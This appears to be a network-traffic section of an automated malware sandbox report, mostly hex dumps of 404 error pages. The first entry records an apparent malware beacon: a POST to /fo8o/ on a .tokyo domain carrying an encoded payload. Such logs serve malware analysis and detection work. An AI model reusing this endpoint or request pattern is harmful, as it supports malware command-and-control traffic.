Source: unknown HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6d 44 41 36 52 35 2f 75 5a 49 5a 42 33 6f 64 4f 69 33 35 50 77 32 33 34 51 51 53 54 4c 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Plm0mn68=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffmDA6R5/uZIZB3odOi35Pw234QQSTL8LW+Fgf0g=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 May 2024 18:20:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:46 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:51 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:56.9522586Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:59.4967144Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:36 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:41 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
